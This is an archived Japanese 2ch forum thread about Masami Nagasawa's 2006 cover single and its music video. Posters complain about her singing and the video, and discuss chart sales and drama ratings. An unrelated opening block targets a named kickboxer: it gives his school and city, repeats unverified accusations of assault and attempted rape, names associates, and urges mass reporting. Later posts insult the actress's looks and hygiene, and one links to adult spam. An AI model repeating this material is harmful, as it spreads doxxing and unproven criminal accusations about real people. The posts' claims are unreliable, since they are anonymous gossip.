http://wiki.livedoor.jp/devilmatome/
http://news18.2ch.net/test/read.cgi/news2/1156009389/l50
http://aa5.2ch.net/test/read.cgi/nanmin/1151876698/l50

ヲタクを盗撮して自身のサイトで無断公開し、「死ねば良いのに」と、言い放ったキックボクサー。
暴行やレイプ未遂を自慢した過去の日記が発見され、一気に話題に。

東京都杉並区荻窪〜西荻窪出身。 杉並区立神明中学校出身 杉並区立神明中学校出身
現在は東京の府中市在住。  杉並区立神明中学校出身 杉並区立神明中学校出身

「男なら掲示板でコソコソやってないで己の拳で勝負しろ」とか言ってた癖に
散々言い訳をし、2ちゃんねらーのオタク代表氏との試合から逃亡。

↓ 通報先です。庵谷の行いを許せないと思う方はどんどん通報しましょう。
http://newsplus.jugem.jp/?cid=23  http://newsplus.jugem.jp/?cid=19
http://newsplus.jugem.jp/?cid=18

庵谷と一緒に悪事を働いていた仲間の内にエイベックス関係者がいます。(深津飛成&伊藤正二郎)
深津もキックボクサーで(元ホストでもある)、今年6月5日に武田幸三と一緒に世界丸見えに出演しました。
深津の方は探偵ファイルの山木陽介とも友人です。
・ちなみに庵谷は本州から出たことは一回きりで、そのときは佐賀に一泊二日の旅をしたとの事。

134 :名無しの歌姫:2006/10/25(水) 18:24:03 ID:6//tprXV
演技下手糞だよなこいつ

135 :名無しの歌姫:2006/10/25(水) 19:31:32 ID:l3w1G3YW
デイリー4位初登場です。上位3人はさすがに強敵ぞろいですね

136 :名無しの歌姫:2006/10/25(水) 20:53:15 ID:7Sp5EUij
>>129
今日某店に買取持ち込んだら150円って言われた。
300円なら売るつもりだったがさすがに止まった。
来週でオリコンの週報が出ればそれに反応して、機械的に300円くらい付ける所があるかもしれない。
それでも、おそらく勝負は1,2日だと思う。
全国で2万〜3万人以上の人間が騙された。
買取殺到で暴落、買取拒否は必死。

137 :名無しの歌姫:2006/10/25(水) 21:03:39 ID:KxIJGm6t
>>136
えっ!じゃあストラップ付を買った自分のはもっと低いのかな…
100円ぐらいか…あ〜鬱。

138 :名無しの歌姫:2006/10/25(水) 21:21:35 ID:JqHDSxlO
DVD付きはブスと機関銃です.

これ編集してまさみだけのPVを独自に作った方がマシだな
ストラップ付きだけでホント良かった.

3200円か・・・・・・.




139 :名無しの歌姫:2006/10/25(水) 21:31:22 ID:JqHDSxlO
そのまま流してると冒頭でまさみが立ってるシーンがあるが
そのグロ映像
中間でまさみ 
またグロ映像
(とにかくガングロは特にヤメテくれ)
でまさみ登場
またグロ
まさみ
グロ

TAKE2もひでぇぇぇぇぇぇっぇぇ


ストラップ付きはステッカーも入ってて◎



140 :名無しの歌姫:2006/10/26(木) 00:40:28 ID:Ej8fYVaL
仕事から帰ってきてから延々とリピートして聴いてる。
もう4時間以上リピートしてる。
歌詞もメロディも歌声もとってもいい。
気持ちいい。
これでDVDさえまともなら、ブスとグロのいない長澤まさみだけを映した
PVがあれば文句なしで癒されたのに。。
PVをリピートして再生しつづけて一日の疲れを取ってストレスを解消して癒されたかった。
ああ・・・グロとブスのDVDが哀しい。
曲だけでなく映像でも楽しみたかったのに。

141 :名無しの歌姫:2006/10/26(木) 00:49:21 ID:3o0e7X5d
まさみがレンジや落ち目の大塚に負けるとはねぇ

142 :名無しの歌姫:2006/10/26(木) 00:55:59 ID:IDrm9aYA
まさみがレンジに勝った沢尻に負けるとはねぇ
理屈の上からいくと当り前かw

143 :名無しの歌姫:2006/10/26(木) 01:30:02 ID:xZmC5iQa
>>140
me tooだよ…orz
本当、PVありえない。まさみだけ永遠に映してくれりゃあいいものを…。
あんなブス共だけで3分半も‥orzくそっ!!年明けに発売のドラマDVD-BOXに何か映像特典つくかな?
まさみフルヴァージョンのPVをどうか‥

144 :名無しの歌姫:2006/10/26(木) 04:14:07 ID:HXa+qLPY
>>143

こんなのあったよw
http://stage6.divx.com/members/66654/videos/1024614

145 :名無しの歌姫:2006/10/26(木) 05:32:25 ID:kwnMO3nQ
歌下手くそだな。これが有線で流れるとまるで晒者のようでかわいそうだ。

146 :名無しの歌姫:2006/10/26(木) 13:38:21 ID:OSncI66V
http://www.youtube.com/watch?v=h6TziPv5xPQ

147 :名無しの歌姫:2006/10/26(木) 20:58:56 ID:EP1iXwXs
800円で買い取ってもらったぉ

148 :ゴミ:2006/10/27(金) 12:19:29 ID:gHFOpUmp
いや〜いらない
だが購入した
1500円と1700円は高い
まぁ内容わかれば1000円でも買わないですね
タダでもいりません

だって長澤まさみの模型ストラップかと思えば変な石像?大仏だし

DVDは本当にクソ
観てビックリしました
観たらくずに眼科に行きましょう

あれは酷い

さて何枚売れますかね〜

できるなら返品死体

結論 買う価値ないです


149 :名無しの歌姫:2006/10/27(金) 12:35:14 ID:46qluWaF
セーラー服と機関銃 1・2話ダイジェスト 

10/27(金) 
後04:00 >> 後04:54  
TBSテレビ
[S] ドラマ/現代劇連続ドラマ

セーラー服と機関銃・大ヒットドラマ・今夜衝撃の3話!特別ダイジェスト

DVDしなさそうだし録画しとこうっと


150 :名無しの歌姫:2006/10/27(金) 12:38:52 ID:46qluWaF
取りあえずPVなんとかしてくれとアンケートしといた
http://jvcmusic.co.jp/1136172


151 :ゴミ:2006/10/27(金) 14:03:26 ID:gHFOpUmp
しかしこのPV腐っています。
ある意味怖いです

3タイプ発売する意味がわからないですし

こんな発想のPVを考えた奴は終ってる

俺でもこんなPVは考えない

と思っている奴は沢山いるはずだ

152 :名無しの歌姫:2006/10/27(金) 14:28:33 ID:189Ulfsp
>>141
大塚ちひろだめじゃん

153 :名無しの歌姫:2006/10/27(金) 15:59:34 ID:46qluWaF
あと1分

154 :名無しの歌姫:2006/10/27(金) 16:01:57 ID:EyumT7tP
http://masamitouch.blog81.fc2.com/

155 :名無しの歌姫:2006/10/27(金) 16:03:13 ID:EyumT7tP
↑このほうが抜けるよ

156 :ロンスー ◆F/D.OPy2Wo :2006/10/27(金) 23:11:55 ID:wHupxeFW
>>85
薬師丸ひろ子はあんなに歌ヘタじゃない。


157 :名無しの歌姫:2006/10/27(金) 23:14:01 ID:Q1PaxnyU
>>156
普通に下手だろ薬師丸だってw

158 :名無しの歌姫:2006/10/27(金) 23:17:26 ID:+BG+hvyi
今聴いたけどなんかまさみちゃんぽかったけど…。ホントにまさみちゃんが歌ってんの?






スッゲー下手なんだが…。ああああセカチューのころはこんなことまでするとは思わなかったのに…。俺のイメージが…

159 :名無しの歌姫:2006/10/27(金) 23:20:51 ID:Q1PaxnyU
>>158
映画ロボコンでトラックの上で山口百恵を歌ってるじゃん
それと比べてみっ!同じだから

160 :名無しの歌姫:2006/10/27(金) 23:38:28 ID:+BG+hvyi
>>159あれはあれで演出だろ。まぁあれは可愛いがこればかりは…



もうダメだな…。まさみちゃんは道を踏み間違えた…。
もうあおいちゃんしか残ってないよ

161 :名無しの歌姫:2006/10/27(金) 23:40:59 ID:gHFOpUmp
あおいって?
テメーのケツがあおいのか(笑)

162 :名無しの歌姫:2006/10/27(金) 23:44:24 ID:+BG+hvyi
つまんね

163 :名無しの歌姫:2006/10/28(土) 07:12:33 ID:zapICStk
ジャイアンはわざと下手に歌ってるけど
まさみは真剣だからね

164 :名無しの歌姫:2006/10/28(土) 12:57:34 ID:yUmK5sFH
>>163
だがそれがいい

PVに関しては、今まで見てきたPVで世界一クソPVだった・・・・.
なんでブス・ゴロ・怪物・汚物・異星人オンパレードなPVを作ったんだか
DVDレコーダー失敗の余波か?ビクター!


165 :名無しの歌姫:2006/10/28(土) 13:50:36 ID:axwjWVpw
PVの長澤すげー不細工に見える

166 :名無しの歌姫:2006/10/28(土) 21:21:21 ID:gwelPh1E
長澤セーラー服姿に超萌え

167 :名無しの歌姫:2006/10/29(日) 00:13:36 ID:pXPc7HZp
萌え燃え

168 :名無しの歌姫:2006/10/29(日) 03:55:01 ID:cYvV3cmG
あと4話

169 :名無しの歌姫:2006/10/29(日) 08:06:49 ID:3LNKEQdO
薬師丸ひろ子は学生時代に合唱部に所属していたぐらいだから
歌が下手なわけがない。

170 :名無しの歌姫:2006/10/29(日) 13:15:35 ID:dfaIJFtE
>>169
ここ来て薬師丸を擁護なんて
20年以上前の話なんでしょ あんた幾つ?キモいよ

171 :名無しの歌姫:2006/10/29(日) 14:00:00 ID:epfk6FXd
あだち充作品といい長澤まさみは日本の名作に泥を塗るを趣味なんですか

172 :名無しの歌姫:2006/10/29(日) 14:15:52 ID:ZgPojbJt
映画のタッチ見てないけど、やっぱり駄作だったか

173 :名無しの歌姫:2006/10/29(日) 18:37:17 ID:IXWGMkpI
もうPVはこれで
ttp://www.youtube.com/watch?v=kPadqEcG6Dw

174 :名無しの歌姫:2006/10/29(日) 23:16:56 ID:MveT3vJo
予約しておくか。

ttp://www.shinseido.co.jp/cgi-bin/WebObjects/Catalog.woa/wa/detail?r=UPCY-5001

175 :名無しの歌姫:2006/10/30(月) 07:26:19 ID:0ZiWYIUk
>>173
これが元の動画

ttp://stage6.divx.com/members/66654/videos/1025437

176 :名無しの歌姫:2006/10/30(月) 14:38:59 ID:f8XT7ZU+
♪ 愛した〜 男たちぃうぉ〜

この部分が好き

177 :名無しの歌姫:2006/10/30(月) 15:16:02 ID:J9vPPiiw
お金返してください

詐欺です

178 :名無しの歌姫:2006/10/30(月) 21:28:08 ID:d+MWz8xT
デイリーチャート3位に上昇

179 :名無しの歌姫:2006/10/30(月) 21:42:33 ID:bL2zq+0/
歌ってるのは私じゃない私はこんなに下手じゃないってラジオで本人がいってたぜ

180 :名無しの歌姫:2006/10/31(火) 09:43:04 ID:24eg7GBr
ジャイアンより酷いよ

181 :名無しの歌姫:2006/11/01(水) 07:59:42 ID:gYcAAqUr
歌ヘタってゆうけど…プロの歌手じゃないんだし、ねえ
昔からアイドル(女優)は敢えてヘタなテイクを
採用するもんなんだよ。カラオケレベルなら
問題なく聞けるけどね。声も曲にあってるし
薬師丸バージョンのイメージも壊してないし
別にいいんじゃないの?オリコン初登場4位、
上出来じゃん。沢尻みたく売る気満々てわけでもないし

182 :名無しの歌姫:2006/11/01(水) 08:58:22 ID:oHze7McN
下手くそすぎてワラタw

183 :名無しの歌姫:2006/11/01(水) 11:46:41 ID:w0JtttVd
エリカかわいいよエリカ

184 :名無しの歌姫:2006/11/01(水) 14:38:21 ID:VZIUtkbo
>>181
長澤まさみ乙

185 :名無しの歌姫:2006/11/01(水) 14:41:37 ID:AaqkTHrO
初動5万超えれば上出来じゃん
初登場少ない週なら1位狙えたかもよ
沢尻ほど上手くないけどあの透き通った声はなかなかイイ

186 :名無しの歌姫:2006/11/01(水) 14:59:35 ID:KGddwTyo
売る気満々じゃないっておかしい
売る気がないならちゃんとした歌手に唄わせてCD出す必要ないだろ

187 :名無しの歌姫:2006/11/01(水) 15:16:38 ID:VZIUtkbo
何万枚売れようが長澤の音痴は事実

188 :名無しの歌姫:2006/11/01(水) 15:23:29 ID:esP64gH/
アンチ多いな

189 :名無しの歌姫:2006/11/01(水) 15:35:14 ID:S5xcjJ2G
長澤演技下手すぎ
顔と胸で騙される男と視聴率稼ぎのミーハーTBSとフジは氏ね!

やっぱり女優は福田麻由子と田中麗奈だな

190 :名無しの歌姫:2006/11/01(水) 15:49:07 ID:ux46TxND
主演ドラマの視聴率が一桁ってほんと?



191 :どうやらマジな様だぜw長澤氏ね:2006/11/01(水) 17:59:30 ID:n+12MczY
曜 時..          [01] [02] [03] [04] [05] [06] [07] [08] [09] [10] [11]    平均
月【21】のだめ       18.2__16.1__18.4__
火【21】役者魂!.   11.4__*8.4__11.8__
  【22】僕の歩く道   19.3__16.4__17.7__18.2__
水【22】14才の母.   19.7__16.8__18.3__
木【20】おみやさん..... 15.0__
  【21】だめんず    10.3__*8.0__
  【22】嫌われ松子... *8.8__10.1__*8.5__
  【22】Dr.コトー2006 23.2__21.5__21.6__
金【21】家族.       13.0__11.4__
  【22】セーラー服..... 17.3__14.2__*9.6__
     笑える恋.     <12/01スタート>
  【23】アンナさん.   *8.1__*7.1__*7.3__
土【21】たったひとつ.....12.8__10.4__12.2__
日【21】鉄板少女.   11.0__*7.3__*8.7__

192 :名無しの歌姫:2006/11/01(水) 21:16:16 ID:esP64gH/
意外だな
見事に名作に泥を塗ったな

193 :名無しの歌姫:2006/11/01(水) 22:19:07 ID:Nx/x0Krk
>>192
何?名作って?
この前CSで劇場版観たけど15分で観るの止めたよ
薬師丸も渡瀬さんも嫌いじゃないが演出がダルいじゃん

194 :名無しの歌姫:2006/11/02(木) 07:53:37 ID:qFwlXntj

   @@@@
  @´  ̄`ヽ
  (,~[・‐][・.]
   ゝ、 )3、,)
  |∪   )



195 :名無しの歌姫:2006/11/02(木) 11:34:52 ID:oVuoPPfF
>>194
6カ国協議復活おめ

196 :名無しの歌姫:2006/11/02(木) 13:33:55 ID:egmm8+U4
>>184
サンキュ
>>185
沢尻のどこがウマイんだ?
大して変わらないだろ

197 :名無しの歌姫:2006/11/02(木) 14:58:17 ID:Blu4eMw6
1700円かえせや〜

198 :名無しの歌姫:2006/11/02(木) 15:03:56 ID:Blu4eMw6
というか沢尻は歌うまいとおもう
オリジナル曲だし
売れても仕方ない
しかしドラマはさほど話題にはなっていなかった

長澤は残念ながら歌手にはむいてない
乳はデカイが

所詮カバー曲というのが無理ある

初回限定盤とか発売する意味がない
観て無いやつはみてください

199 :名無しの歌姫:2006/11/02(木) 23:47:10 ID:fPDKlrTR
 「セーラー服と機関銃」のCDシングルを買いました。
オリコン初登場4位!やったね、上出来だね!!!

200 :名無しの歌姫:2006/11/03(金) 00:20:21 ID:Q2wjP4EE
200GeT!
あのPVで4位なら大健闘だな。

201 :名無しの歌姫:2006/11/03(金) 08:40:26 ID:Bg6TCxch
>>198 「あなたはずっ○ず○とぉ〜」の部分でもう、上手くないのが判ってしまっている。

202 :名無しの歌姫:2006/11/03(金) 17:25:33 ID:F0TQ6wC2
本人否定も肯定もしないけど結局この疑惑どうなの?w
http://music5.2ch.net/test/read.cgi/musicj/1162541711/

203 :名無しの歌姫:2006/11/03(金) 22:04:08 ID:9gUxtWUp
>>191
コトー化け物だ

このこ可愛いけど顔に個性がない希ガス

204 :名無しの歌姫:2006/11/04(土) 01:27:57 ID:fVVOQtCq
まだデーリー10位以内だねまさみ
沢尻とまさみの二人には天は二物を与えたんだねまさみ

205 :名無しの歌姫:2006/11/04(土) 06:50:00 ID:l36FcdFr
まさみ「前の方、座らないでくだすぁ〜い(ヘラヘラ
  どう思う?座ってたよ?、今
  前の方で見てるのにさぁ、座ってたよ?
  感 じ 悪 い ね 〜〜〜〜〜』

206 :名無しの歌姫:2006/11/04(土) 14:28:50 ID:2kMxfG1d
柴咲コウは、そりゃ上手だよ
でも、長澤まさみ、沢尻エリカ、綾瀬はるかは
似たり寄ったりだと思うよ

207 :名無しの歌姫:2006/11/04(土) 19:16:12 ID:jgcuDYoJ
なんで意味のないその辺の女子高生のカットがあんの?
金なかったから???

208 :名無しの歌姫:2006/11/04(土) 19:54:22 ID:+DmQ+Sl3
ちょっと年寄りから「長澤」がこの曲でみせる歌唱力について言わせて貰いたい。
なんか不評なレスも多く、この歌で彼女の歌唱力を否定する意見があるけど・・・それはちょっと彼女が可哀想だよ。

映画版を観たり、薬師丸の「(キティー版)セーラー服と機関銃」を聴けば解るけど、この長澤の歌唱法はそれこそ「薬師丸=星泉」のまんま真似をしているんだよ。
それこそ薬師丸の「投げ遣り」で「無感情」に聞こえるような歌唱法をね。
まったくの物真似でしかない。
だから彼女の歌唱力とは関係無く作られていると思う。
その企画の是非は別に論じるにしても彼女の歌唱力を責めるのは酷だよ。   

あくまでも「星泉」が歌っているだけなんだから。



209 :名無しの歌姫:2006/11/04(土) 23:33:56 ID:AGD+EI54







210 :名無しの歌姫:2006/11/05(日) 03:48:32 ID:s1VD0Pjr
>>208
映画版リアルタイム世代ですが、、、
薬師丸さんの次作の「探偵物語」は作者である大滝詠一さんの歌うデモカセット聞いて覚えたみたいですね。
その流れから想像するのですが、「セーラー服…」も来生さんの歌ありきだったのではないでしょうか?

それを抜きにして
>>「薬師丸=星泉」のまんま真似をしているんだよ。
は少し乱暴な気がします。

個人的には「薬師丸さん版」は大好きですが、今回の「星泉版」もとてもよいと思います。

211 :名無しの歌姫:2006/11/05(日) 13:04:13 ID:lTobAFF3
リアルタイムで聴いてたし、当時来生たかおのコンサートにも行ったけど。
長澤バージョン悪くないと思うよ。
この歌はメロディーや歌詞はドラマティックだけど、歌詞の内容からすると男が歌う歌だから、
演出上は余り情感を込めずに”ぶっきらぼう”に歌うようにしてると思う。
長澤の歌唱力とは別問題だけど。
PVは知らんけど、ドラマのバックに流すには合ってると思う。

212 :名無しの歌姫:2006/11/05(日) 14:13:37 ID:VEyLof5g
映画版の主題歌は元々来生たかおが唄う予定だったよ

213 :名無しの歌姫:2006/11/05(日) 14:40:56 ID:y7LcHNwn
2006年11月06日 付  オリコン週間ランキング
http://www.oricon.co.jp/rank/js/w/

結構、売れたな・・・

214 :名無しの歌姫:2006/11/05(日) 17:39:03 ID:K8i7eq3Y
今PV見た。
あの女達が何と言ってるのか気になる。
誰かこのPVを何度も何度も何度も見直して
唇を読んでくれ。


215 :名無しの歌姫:2006/11/05(日) 18:06:36 ID:YPPyT21L
何度も見る気がおきない

216 :名無しさん:2006/11/05(日) 19:37:07 ID:QPZPz9I/
イィょねこの曲!!長澤まさみこのまま歌手デビューしそう

217 :名無しの歌姫:2006/11/06(月) 03:37:17 ID:c86ilu77
PVは糞だな

218 :名無しの歌姫:2006/11/06(月) 04:31:00 ID:nyTVpb6I
聞いてて めざわりな歌唱力だな

219 :名無しの歌姫:2006/11/06(月) 06:32:33 ID:Qm9DL18h
6:20台捕獲

7:30からもまざまし録画しとけ

220 :名無しの歌姫:2006/11/06(月) 06:36:31 ID:Qm9DL18h
まざましってなんだorz

めざましてれびな

221 :名無しの歌姫:2006/11/07(火) 10:57:50 ID:byPsy3AG
なんのせ金返せ
先にPV観ていたら絶対にCD購入してから

長澤ガッカリだよ〜


222 :名無しの歌姫:2006/11/08(水) 01:21:09 ID:8dhKnzbt
PVを目覚ましがわりにセットした
→その結果、怖くて起きれなかった

223 :名無しの歌姫:2006/11/08(水) 18:52:34 ID:IeGsunU0
スーパーに行く度にこの曲が流れていて非常に不快な思いをしている

224 :名無しの歌姫:2006/11/10(金) 22:44:20 ID:BpqlyZ4H
PVのJKが言ってるのって好きな男の名前だと思うなあ!

225 :名無しの歌姫:2006/11/11(土) 10:40:57 ID:IQ+Id5nO
公害レベルの音痴だ

226 :名無しの歌姫:2006/11/11(土) 15:23:43 ID:BuUDd5oE
この音痴さが初々しくて役に合ってる
歌手としてはダメだけど

227 :名無しの歌姫:2006/11/11(土) 15:25:38 ID:BHYLZWSx
http://ex13.2ch.net/test/read.cgi/heaven4vip/1163218125/l50

228 :名無しの歌姫:2006/11/12(日) 03:40:25 ID:nJ+g3pM0
確かに歌唱力は無いかもしれんが、音痴ではないだろ。

229 :名無しの歌姫:2006/11/12(日) 15:51:56 ID:QJYz2+Nm
近田春夫が文春で誉めてたよ

230 :名無しの歌姫:2006/11/12(日) 16:07:28 ID:4PvTj1Co
ロボコンでのアカペラはやけに上手かった気がするんだがなぁ
ttp://ma-radio.seesaa.net/image/ro.wmv

231 :名無しの歌姫:2006/11/12(日) 16:50:31 ID:+MWvY4BC
確かに歌ははっきりいってへただねw
何か声変わりする前の男の子って感じ。
でもまぁ一つくらいそういうのがあったほうが愛敬あっていいね

232 :名無しの歌姫:2006/11/13(月) 07:36:30 ID:chk0uC39
あ〜いちた〜♪ おとぉこぉたてぃーうぉ♪
したたらず声可愛いじゃん

233 :名無しの歌姫:2006/11/16(木) 14:42:40 ID:p3pU0Ghc
曲自体は、来生コンビの名曲だからね
取り敢えず、薬師丸バージョンも聴いてみた
二人とも年齢的にはほぼ同じなんだけど
薬師丸のが大人びていて驚いた。ややカタイね
長澤のは舌足らずでカワイイ感じだね
どっちもピュアな良さがある

234 :名無しの歌姫:2006/11/21(火) 04:35:22 ID:1HQpoZGB
疑問視され始めた長澤まさみ人気

叩き主流の週刊誌でも、まさみちゃんだけはヨイショ記事が目立つ。
ドラマ辛口批評の特集を組んでもなぜか長澤だけは褒められているという有り様だ。
そんな異様な持ち上げぶりにアイドルファンからは、
「マスコミが長澤人気を作っているだけじゃないか?」
との声も聞かれるようになった。


http://www.tanteifile.com/geinou/scoop_2006/11/17_01/index.html




235 :名無しの歌姫:2006/11/21(火) 11:44:50 ID:lf6RBmQc
読唇術に長けている方いませんか 彼女PVでなんて言ってんでしょうか? どうか教えて下さい

236 :名無しの歌姫:2006/11/21(火) 12:05:28 ID:ehWK1G1U
長澤まさみ って 
「金」「権力」「しがらみ」「捏造」「偽装」「水増し」「ロリ」
 世の中の一番きたない部分の象徴に見えて仕方がない。
 長澤まさみさんを見て「不快」に感じるのは仕方がない。





237 :名無しの歌姫:2006/11/22(水) 00:54:44 ID:r9fgfHGe
>>235
途中区切っていて二名言っている様に見える。
「○○です、**(←何かの繋ぎ言葉)△△」と。

***と後者△△は「あと、おとうさん」っぽい。
前者の○○がわかりにくい。
「ただとし」「まさとし」「かずよし」(他にも候補は沢山有りそう)と言った感じか。

ま、事務所の方針も有るだろうし前者も実兄の名前(どういう名前かシラネ)っていうオチでしょ、多分w

238 :名無しの歌姫:2006/11/26(日) 17:53:49 ID:rj2KWS3Q
最終回、「か、い、か、ん」言わなんだ! ガッカリだよ〜! (`・ω・´)

239 :名無しの歌姫:2006/11/29(水) 00:41:57 ID:AxJ6rPZY
特に期待なし

240 :名無しの歌姫:2006/12/02(土) 17:16:34 ID:l9rR73/a
2006年オリコン年間チャート予想スレ
http://music5.2ch.net/test/read.cgi/musicj/1165041634/

241 :名無しの歌姫:2006/12/04(月) 00:54:58 ID:WW78euTV
>>214 1人1人違う事言ってる・・・?
可愛い子もたまにいるね


242 :名無しの歌姫:2006/12/04(月) 00:59:55 ID:h3UMW3TL
>>236
激しく同意
長澤は女の敵だからな

243 :名無しの歌姫:2006/12/04(月) 01:26:11 ID:7vuldFuX
恋人ここでやっと見つけた
長澤ちゃん似の女と付き合えた。携帯で無料のH動画・画像見るのがいいいよ。
http://tool-4.net/?tvtop


244 :名無しの歌姫:2006/12/04(月) 21:09:57 ID:B3O96hmb
かいかん

245 :名無しの歌姫:2006/12/05(火) 02:29:39 ID:L0pAp+Bj
長澤まさみ おもいっきりぶさいくで魅力ないやろ


246 :名無しの歌姫:2006/12/05(火) 04:02:55 ID:8WljuLR/
どこが可愛いんだろう・・・

247 :名無しの歌姫:2006/12/05(火) 04:40:07 ID:S331XgmE
清純ぶりっこのアイドル女優は板違い

248 :名無しの歌姫:2006/12/05(火) 06:07:09 ID:F1Gc4MUS
デカイくせにブリッコwwwキモス

249 :川*^∇^)||<ナイスグッドです :2006/12/05(火) 06:34:18 ID:u6vBwCAG
空高く Woh!Woh! 光放つ 熊井ちゃん♪
ttp://hellogirls.myphotos.cc/files/data/hellogirls24294.jpg
ttp://hellogirls.myphotos.cc/files/data/hellogirls24295.gif



250 :ロンスー ◆F/D.OPy2Wo :2006/12/08(金) 20:20:46 ID:dKWoN1a9
>>238
佐久間にキスもしなかったな。


251 :名無しの歌姫:2006/12/08(金) 21:17:14 ID:NrTea/3U
s

252 :名無しの歌姫:2006/12/09(土) 00:04:06 ID:QQIgP9LD


253 :名無しの歌姫:2006/12/09(土) 01:22:52 ID:8ZO+fApD
頭皮がくさいことを自白。終わりだなこいつ・・・

254 :名無しの歌姫:2006/12/10(日) 00:59:33 ID:6l6euSOC
舌がくさい
唾がくさい     −>ソースあり
頭皮がくさい

こんなに不潔なアイドルのファンは皆やめたほうがいいよ

255 :名無しの歌姫:2006/12/31(日) 12:49:26 ID:oAT8aJq4
>>254
いいねー逆にいいよ君



256 :名無しの歌姫:2007/01/05(金) 08:05:46 ID:o47ijBqh

11.0% 21:00-23:30 CX* 新春ドラマスペシャル「明智光秀〜神に愛されなかった男〜」

長澤は女優として完全に終わった





257 :名無しの歌姫:2007/01/07(日) 21:01:50 ID:25ul6d6o
>>236
全文に同意!
長澤は薬師丸さんの歌をとんねるずの番組で
馬鹿にしていたと思う。性格悪すぎ。

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)